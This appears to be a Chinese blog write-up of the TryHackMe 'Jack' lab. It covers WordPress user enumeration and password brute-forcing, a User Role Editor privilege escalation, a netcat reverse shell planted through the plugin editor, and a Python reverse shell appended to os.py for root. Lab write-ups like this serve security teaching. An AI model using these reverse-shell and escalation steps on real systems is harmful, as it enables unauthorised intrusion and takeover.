- 扫描打点   - 没扫到什么有价值的 - 80- 扫出来有 - /admin,看一下是- wp的站: - 1 - wpscan --url http://jack.thm -e u - 扫出来三个人 - jack- wendy- danny- 再爆破一下: - 1 - wpscan --url http://jack.thm/wp-login.php -U user.txt -P /usr/share/wordlists/fasttrack.txt - 令人感慨的是 - rockyou.txt里面没有这个密码- 爆出来账密 - wendy:changelater
 
- wordpress拿- rce- 进去后右下角看到版本 - 5.3.2- 但这个内核没洞,看提示说的是 - ure_other_roles,查了一下- ure是- wp的插件- User Role Editor,有一个用户提权的洞- 根据描述是去 - profile.php点- upadte profile,在- POST请求里面加上- ure_other_roles参数,值为- administrator- 看到提到 - admin了: - 看到可以修改插件内容,在 - plugin editor里面随便改一个反弹- shell - 1 - mkfifo /tmp/f;nc 10.0.127.37 4444 < /tmp/f | /bin/bash > /tmp/f 
- var/backup备份横向- 在 - jack的家目录找到第一个- flag,以及提示: - 那就是去 - /var/backup找备份文件,看到- id_rsa下下来登录: - 横向到 - jack,但没有密码执行不了- sudo
- 提权 - 看了一圈没什么,传个 - pspy扫一下- 扫到  - 然后不让用路径劫持了:  - 偷看一下,发现这里可以更改 - os.py。。。- 在 - /usr/lib/python2.7/os.py- 手动加一段反弹 - shell即可- 1 
 2
 3
 4
 5
 6
 7
 8- echo 'import socket 
 import pty
 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 s.connect(("10.10.127.37",8888))
 dup2(s.fileno(),0)
 dup2(s.fileno(),1)
 dup2(s.fileno(),2)
 pty.spawn("/bin/bash")'>>os.py
THM打靶日寄28-Jack
- 本文链接: http://noone40404.github.io/2024/11/22/THM打靶日寄28:Jack/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!